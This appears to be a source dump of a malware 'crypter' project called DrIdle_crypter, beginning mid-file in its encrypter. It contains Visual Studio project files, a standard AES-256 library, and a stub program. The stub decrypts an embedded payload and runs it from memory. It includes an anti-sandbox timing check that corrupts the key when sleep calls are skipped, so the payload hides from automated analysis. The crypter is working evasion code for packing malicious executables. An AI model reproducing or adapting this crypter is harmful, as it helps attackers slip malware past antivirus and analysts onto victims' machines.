35 | aes256_encrypt_ecb(&ctx, buf);
36 | }
37 |
38 | aes256_done(&ctx);
39 | //************************************************
40 |
41 | //************* write encrypted data to file ***********
42 | if (text != NULL) {
43 | char absPath[500];
44 | if (strrchr(argv[0], '\\') == NULL) {
45 | strcpy (absPath, "encrypted.dat");
46 | } else {
47 | char* path = argv[0];
48 | path[strrchr(argv[0], '\\') - path + 1] = 0;
49 | strcpy (absPath, path);
50 | strcat (absPath,"encrypted.dat");
51 | }
52 | FILE *outFile = fopen(absPath, "wb");
53 | fwrite(text, lSize, 1, outFile);
54 | fclose (outFile);
55 | }
56 | free(text);
57 | //******************************************************
58 |
59 | puts("done");
60 |
61 | return 0;
62 | } /* main */
63 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}
15 | Win32Proj
16 | MyEncrypter
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | true
42 |
43 |
44 | false
45 |
46 |
47 |
48 | Use
49 | Level3
50 | Disabled
51 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
52 | MultiThreadedDebug
53 |
54 |
55 | Console
56 | true
57 |
58 |
59 |
60 |
61 | Level3
62 | Use
63 | MaxSpeed
64 | true
65 | true
66 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
67 | MultiThreaded
68 |
69 |
70 | Console
71 | true
72 | true
73 | true
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 | Create
86 | Create
87 |
88 |
89 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Headerdateien
20 |
21 |
22 | Headerdateien
23 |
24 |
25 | Headerdateien
26 |
27 |
28 |
29 |
30 | Quelldateien
31 |
32 |
33 | Quelldateien
34 |
35 |
36 | Quelldateien
37 |
38 |
39 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/aes256.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #include "stdafx.h"
21 | #include "aes256.h"
22 |
23 | #define F(x) (((x)<<1) ^ ((((x)>>7) & 1) * 0x1b))
24 | #define FD(x) (((x) >> 1) ^ (((x) & 1) ? 0x8d : 0))
25 |
26 | // #define BACK_TO_TABLES
27 | #ifdef BACK_TO_TABLES
28 |
29 | const uint8_t sbox[256] = {
30 | 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5,
31 | 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
32 | 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0,
33 | 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
34 | 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc,
35 | 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
36 | 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a,
37 | 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
38 | 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0,
39 | 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
40 | 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b,
41 | 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
42 | 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85,
43 | 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
44 | 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5,
45 | 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
46 | 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17,
47 | 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
48 | 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88,
49 | 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
50 | 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c,
51 | 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
52 | 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9,
53 | 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
54 | 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6,
55 | 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
56 | 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e,
57 | 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
58 | 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94,
59 | 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
60 | 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68,
61 | 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
62 | };
63 | const uint8_t sboxinv[256] = {
64 | 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38,
65 | 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb,
66 | 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87,
67 | 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb,
68 | 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d,
69 | 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e,
70 | 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2,
71 | 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25,
72 | 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16,
73 | 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92,
74 | 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda,
75 | 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84,
76 | 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a,
77 | 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06,
78 | 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02,
79 | 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b,
80 | 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea,
81 | 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73,
82 | 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85,
83 | 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e,
84 | 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89,
85 | 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b,
86 | 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20,
87 | 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4,
88 | 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31,
89 | 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f,
90 | 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d,
91 | 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef,
92 | 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0,
93 | 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61,
94 | 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26,
95 | 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
96 | };
97 |
98 | #define rj_sbox(x) sbox[(x)]
99 | #define rj_sbox_inv(x) sboxinv[(x)]
100 |
101 | #else /* tableless subroutines */
102 |
103 | /* -------------------------------------------------------------------------- */
104 | uint8_t gf_alog(uint8_t x) // calculate anti-logarithm gen 3
105 | {
106 | uint8_t atb = 1, z;
107 |
108 | while (x--) {z = atb; atb <<= 1; if (z & 0x80) atb^= 0x1b; atb ^= z;}
109 |
110 | return atb;
111 | } /* gf_alog */
112 |
113 | /* -------------------------------------------------------------------------- */
114 | uint8_t gf_log(uint8_t x) // calculate logarithm gen 3
115 | {
116 | uint8_t atb = 1, i = 0, z;
117 |
118 | do {
119 | if (atb == x) break;
120 | z = atb; atb <<= 1; if (z & 0x80) atb^= 0x1b; atb ^= z;
121 | } while (++i > 0);
122 |
123 | return i;
124 | } /* gf_log */
125 |
126 |
127 | /* -------------------------------------------------------------------------- */
128 | uint8_t gf_mulinv(uint8_t x) // calculate multiplicative inverse
129 | {
130 | return (x) ? gf_alog(255 - gf_log(x)) : 0;
131 | } /* gf_mulinv */
132 |
133 | /* -------------------------------------------------------------------------- */
134 | uint8_t rj_sbox(uint8_t x)
135 | {
136 | uint8_t y, sb;
137 |
138 | sb = y = gf_mulinv(x);
139 | y = (y<<1)|(y>>7); sb ^= y; y = (y<<1)|(y>>7); sb ^= y;
140 | y = (y<<1)|(y>>7); sb ^= y; y = (y<<1)|(y>>7); sb ^= y;
141 |
142 | return (sb ^ 0x63);
143 | } /* rj_sbox */
144 |
145 | /* -------------------------------------------------------------------------- */
146 | uint8_t rj_sbox_inv(uint8_t x)
147 | {
148 | uint8_t y, sb;
149 |
150 | y = x ^ 0x63;
151 | sb = y = (y<<1)|(y>>7);
152 | y = (y<<2)|(y>>6); sb ^= y; y = (y<<3)|(y>>5); sb ^= y;
153 |
154 | return gf_mulinv(sb);
155 | } /* rj_sbox_inv */
156 |
157 | #endif
158 |
159 | /* -------------------------------------------------------------------------- */
160 | uint8_t rj_xtime(uint8_t x)
161 | {
162 | return (x & 0x80) ? ((x << 1) ^ 0x1b) : (x << 1);
163 | } /* rj_xtime */
164 |
165 | /* -------------------------------------------------------------------------- */
166 | void aes_subBytes(uint8_t *buf)
167 | {
168 | register uint8_t i = 16;
169 |
170 | while (i--) buf[i] = rj_sbox(buf[i]);
171 | } /* aes_subBytes */
172 |
173 | /* -------------------------------------------------------------------------- */
174 | void aes_subBytes_inv(uint8_t *buf)
175 | {
176 | register uint8_t i = 16;
177 |
178 | while (i--) buf[i] = rj_sbox_inv(buf[i]);
179 | } /* aes_subBytes_inv */
180 |
181 | /* -------------------------------------------------------------------------- */
182 | void aes_addRoundKey(uint8_t *buf, uint8_t *key)
183 | {
184 | register uint8_t i = 16;
185 |
186 | while (i--) buf[i] ^= key[i];
187 | } /* aes_addRoundKey */
188 |
189 | /* -------------------------------------------------------------------------- */
190 | void aes_addRoundKey_cpy(uint8_t *buf, uint8_t *key, uint8_t *cpk)
191 | {
192 | register uint8_t i = 16;
193 |
194 | while (i--) buf[i] ^= (cpk[i] = key[i]), cpk[16+i] = key[16 + i];
195 | } /* aes_addRoundKey_cpy */
196 |
197 |
198 | /* -------------------------------------------------------------------------- */
199 | void aes_shiftRows(uint8_t *buf)
200 | {
201 | register uint8_t i, j; /* to make it potentially parallelable :) */
202 |
203 | i = buf[1]; buf[1] = buf[5]; buf[5] = buf[9]; buf[9] = buf[13]; buf[13] = i;
204 | i = buf[10]; buf[10] = buf[2]; buf[2] = i;
205 | j = buf[3]; buf[3] = buf[15]; buf[15] = buf[11]; buf[11] = buf[7]; buf[7] = j;
206 | j = buf[14]; buf[14] = buf[6]; buf[6] = j;
207 |
208 | } /* aes_shiftRows */
209 |
210 | /* -------------------------------------------------------------------------- */
211 | void aes_shiftRows_inv(uint8_t *buf)
212 | {
213 | register uint8_t i, j; /* same as above :) */
214 |
215 | i = buf[1]; buf[1] = buf[13]; buf[13] = buf[9]; buf[9] = buf[5]; buf[5] = i;
216 | i = buf[2]; buf[2] = buf[10]; buf[10] = i;
217 | j = buf[3]; buf[3] = buf[7]; buf[7] = buf[11]; buf[11] = buf[15]; buf[15] = j;
218 | j = buf[6]; buf[6] = buf[14]; buf[14] = j;
219 |
220 | } /* aes_shiftRows_inv */
221 |
222 | /* -------------------------------------------------------------------------- */
223 | void aes_mixColumns(uint8_t *buf)
224 | {
225 | register uint8_t i, a, b, c, d, e;
226 |
227 | for (i = 0; i < 16; i += 4)
228 | {
229 | a = buf[i]; b = buf[i + 1]; c = buf[i + 2]; d = buf[i + 3];
230 | e = a ^ b ^ c ^ d;
231 | buf[i] ^= e ^ rj_xtime(a^b); buf[i+1] ^= e ^ rj_xtime(b^c);
232 | buf[i+2] ^= e ^ rj_xtime(c^d); buf[i+3] ^= e ^ rj_xtime(d^a);
233 | }
234 | } /* aes_mixColumns */
235 |
236 | /* -------------------------------------------------------------------------- */
237 | void aes_mixColumns_inv(uint8_t *buf)
238 | {
239 | register uint8_t i, a, b, c, d, e, x, y, z;
240 |
241 | for (i = 0; i < 16; i += 4)
242 | {
243 | a = buf[i]; b = buf[i + 1]; c = buf[i + 2]; d = buf[i + 3];
244 | e = a ^ b ^ c ^ d;
245 | z = rj_xtime(e);
246 | x = e ^ rj_xtime(rj_xtime(z^a^c)); y = e ^ rj_xtime(rj_xtime(z^b^d));
247 | buf[i] ^= x ^ rj_xtime(a^b); buf[i+1] ^= y ^ rj_xtime(b^c);
248 | buf[i+2] ^= x ^ rj_xtime(c^d); buf[i+3] ^= y ^ rj_xtime(d^a);
249 | }
250 | } /* aes_mixColumns_inv */
251 |
252 | /* -------------------------------------------------------------------------- */
253 | void aes_expandEncKey(uint8_t *k, uint8_t *rc)
254 | {
255 | register uint8_t i;
256 |
257 | k[0] ^= rj_sbox(k[29]) ^ (*rc);
258 | k[1] ^= rj_sbox(k[30]);
259 | k[2] ^= rj_sbox(k[31]);
260 | k[3] ^= rj_sbox(k[28]);
261 | *rc = F( *rc);
262 |
263 | for(i = 4; i < 16; i += 4) k[i] ^= k[i-4], k[i+1] ^= k[i-3],
264 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
265 | k[16] ^= rj_sbox(k[12]);
266 | k[17] ^= rj_sbox(k[13]);
267 | k[18] ^= rj_sbox(k[14]);
268 | k[19] ^= rj_sbox(k[15]);
269 |
270 | for(i = 20; i < 32; i += 4) k[i] ^= k[i-4], k[i+1] ^= k[i-3],
271 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
272 |
273 | } /* aes_expandEncKey */
274 |
275 | /* -------------------------------------------------------------------------- */
276 | void aes_expandDecKey(uint8_t *k, uint8_t *rc)
277 | {
278 | uint8_t i;
279 |
280 | for(i = 28; i > 16; i -= 4) k[i+0] ^= k[i-4], k[i+1] ^= k[i-3],
281 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
282 |
283 | k[16] ^= rj_sbox(k[12]);
284 | k[17] ^= rj_sbox(k[13]);
285 | k[18] ^= rj_sbox(k[14]);
286 | k[19] ^= rj_sbox(k[15]);
287 |
288 | for(i = 12; i > 0; i -= 4) k[i+0] ^= k[i-4], k[i+1] ^= k[i-3],
289 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
290 |
291 | *rc = FD(*rc);
292 | k[0] ^= rj_sbox(k[29]) ^ (*rc);
293 | k[1] ^= rj_sbox(k[30]);
294 | k[2] ^= rj_sbox(k[31]);
295 | k[3] ^= rj_sbox(k[28]);
296 | } /* aes_expandDecKey */
297 |
298 |
299 | /* -------------------------------------------------------------------------- */
300 | void aes256_init(aes256_context *ctx, uint8_t *k)
301 | {
302 | uint8_t rcon = 1;
303 | register uint8_t i;
304 |
305 | for (i = 0; i < sizeof(ctx->key); i++) ctx->enckey[i] = ctx->deckey[i] = k[i];
306 | for (i = 8;--i;) aes_expandEncKey(ctx->deckey, &rcon);
307 | } /* aes256_init */
308 |
309 | /* -------------------------------------------------------------------------- */
310 | void aes256_done(aes256_context *ctx)
311 | {
312 | register uint8_t i;
313 |
314 | for (i = 0; i < sizeof(ctx->key); i++)
315 | ctx->key[i] = ctx->enckey[i] = ctx->deckey[i] = 0;
316 | } /* aes256_done */
317 |
318 | /* -------------------------------------------------------------------------- */
319 | void aes256_encrypt_ecb(aes256_context *ctx, uint8_t *buf)
320 | {
321 | uint8_t i, rcon;
322 |
323 | aes_addRoundKey_cpy(buf, ctx->enckey, ctx->key);
324 | for(i = 1, rcon = 1; i < 14; ++i)
325 | {
326 | aes_subBytes(buf);
327 | aes_shiftRows(buf);
328 | aes_mixColumns(buf);
329 | if( i & 1 ) aes_addRoundKey( buf, &ctx->key[16]);
330 | else aes_expandEncKey(ctx->key, &rcon), aes_addRoundKey(buf, ctx->key);
331 | }
332 | aes_subBytes(buf);
333 | aes_shiftRows(buf);
334 | aes_expandEncKey(ctx->key, &rcon);
335 | aes_addRoundKey(buf, ctx->key);
336 | } /* aes256_encrypt */
337 |
338 | /* -------------------------------------------------------------------------- */
339 | void aes256_decrypt_ecb(aes256_context *ctx, uint8_t *buf)
340 | {
341 | uint8_t i, rcon;
342 |
343 | aes_addRoundKey_cpy(buf, ctx->deckey, ctx->key);
344 | aes_shiftRows_inv(buf);
345 | aes_subBytes_inv(buf);
346 |
347 | for (i = 14, rcon = 0x80; --i;)
348 | {
349 | if( ( i & 1 ) )
350 | {
351 | aes_expandDecKey(ctx->key, &rcon);
352 | aes_addRoundKey(buf, &ctx->key[16]);
353 | }
354 | else aes_addRoundKey(buf, ctx->key);
355 | aes_mixColumns_inv(buf);
356 | aes_shiftRows_inv(buf);
357 | aes_subBytes_inv(buf);
358 | }
359 | aes_addRoundKey( buf, ctx->key);
360 | } /* aes256_decrypt */
361 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/aes256.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #ifndef uint8_t
21 | #define uint8_t unsigned char
22 | #endif
23 |
24 | #ifdef __cplusplus
25 | extern "C" {
26 | #endif
27 |
28 | typedef struct {
29 | uint8_t key[32];
30 | uint8_t enckey[32];
31 | uint8_t deckey[32];
32 | } aes256_context;
33 |
34 |
35 | void aes256_init(aes256_context *, uint8_t * /* key */);
36 | void aes256_done(aes256_context *);
37 | void aes256_encrypt_ecb(aes256_context *, uint8_t * /* plaintext */);
38 | void aes256_decrypt_ecb(aes256_context *, uint8_t * /* cipertext */);
39 |
40 | #ifdef __cplusplus
41 | }
42 | #endif
43 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.cpp
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter/targetver.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual C++ Express 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MyStub", "MyStub\MyStub.vcxproj", "{9891E9A9-F2C9-4EED-861B-932599CF7F80}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Debug|Win32.Build.0 = Debug|Win32
14 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Release|Win32.ActiveCfg = Release|Win32
15 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub.suo
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "aes256.h"
3 | #include "resourcemanager.h"
4 | #include
5 | //#include
6 |
7 | int isCodeExecuted() {
8 | SYSTEMTIME st1, st2;
9 | do {
10 | GetSystemTime(&st1);
11 | Sleep(2000);
12 | GetSystemTime(&st2);
13 | } while (st1.wMinute != st2.wMinute);
14 |
15 | if (st2.wSecond - st1.wSecond > 1) {
16 | return 1;
17 | } else {
18 | return 0;
19 | }
20 | }
21 |
22 | int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
23 | {
24 | //********* read resource **********************
25 | unsigned long dwSize;
26 | unsigned char* resourcePtr = ResourceManager::GetResource(132, "BIN", &dwSize);
27 | if (resourcePtr == NULL) return 0;
28 | //**********************************************
29 |
30 | //********* copy to heap **********************
31 | unsigned char* lpMemory = (unsigned char*)malloc(dwSize);
32 | memset(lpMemory,0,dwSize);
33 | memcpy (lpMemory, resourcePtr, dwSize);
34 | //*********************************************
35 |
36 | //********* check if code is executed *********
37 | int isExecuted = isCodeExecuted();
38 | //*********************************************
39 |
40 | //********* AES decryption ********************
41 | unsigned char keyVal;
42 | if (isExecuted) {
43 | keyVal = 0x7d;
44 | } else {
45 | keyVal = 0x61;
46 | }
47 | unsigned char key[32] = {
48 | 0x53, 0x28, 0x40, 0x6e, 0x2f, 0x64, 0x63, 0x5d, 0x2d, 0x61, 0x77, 0x40, 0x76, 0x71, 0x77, 0x28,
49 | 0x74, 0x61, keyVal, 0x66, 0x61, 0x73, 0x3b, 0x5d, 0x66, 0x6d, 0x3c, 0x3f, 0x7b, 0x66, 0x72, 0x36
50 | };
51 |
52 | aes256_context ctx;
53 | aes256_init(&ctx, key);
54 |
55 | unsigned char *buf;
56 |
57 | for (unsigned long i = 0; i < dwSize/16; i++) {
58 | buf = lpMemory + (i * 16);
59 | aes256_decrypt_ecb(&ctx, buf);
60 | }
61 |
62 | aes256_done(&ctx);
63 | //*********************************************
64 |
65 | //********* execute ***********
66 | ResourceManager::RunFromMemory(lpMemory,__argv[0]);
67 | //*****************************
68 |
69 | /*FILE *outFile = fopen("decrypted.dat", "wb");
70 | fwrite(text, size, 1, outFile);
71 | fclose (outFile);*/
72 |
73 | return 0;
74 | }
75 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}
15 | Win32Proj
16 | MyStub
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | true
42 |
43 |
44 | false
45 |
46 |
47 |
48 | Use
49 | Level3
50 | Disabled
51 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
52 | MultiThreadedDebug
53 |
54 |
55 | Windows
56 | true
57 |
58 |
59 |
60 |
61 | Level3
62 | Use
63 | MaxSpeed
64 | true
65 | true
66 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
67 | MultiThreaded
68 |
69 |
70 | Windows
71 | true
72 | true
73 | true
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 | MultiThreaded
88 | MultiThreadedDebug
89 |
90 |
91 | Create
92 | Create
93 |
94 |
95 |
96 |
97 |
98 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Headerdateien
20 |
21 |
22 | Headerdateien
23 |
24 |
25 | Headerdateien
26 |
27 |
28 | Headerdateien
29 |
30 |
31 | Headerdateien
32 |
33 |
34 |
35 |
36 | Quelldateien
37 |
38 |
39 | Quelldateien
40 |
41 |
42 | Quelldateien
43 |
44 |
45 | Quelldateien
46 |
47 |
48 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.vcxproj.user:
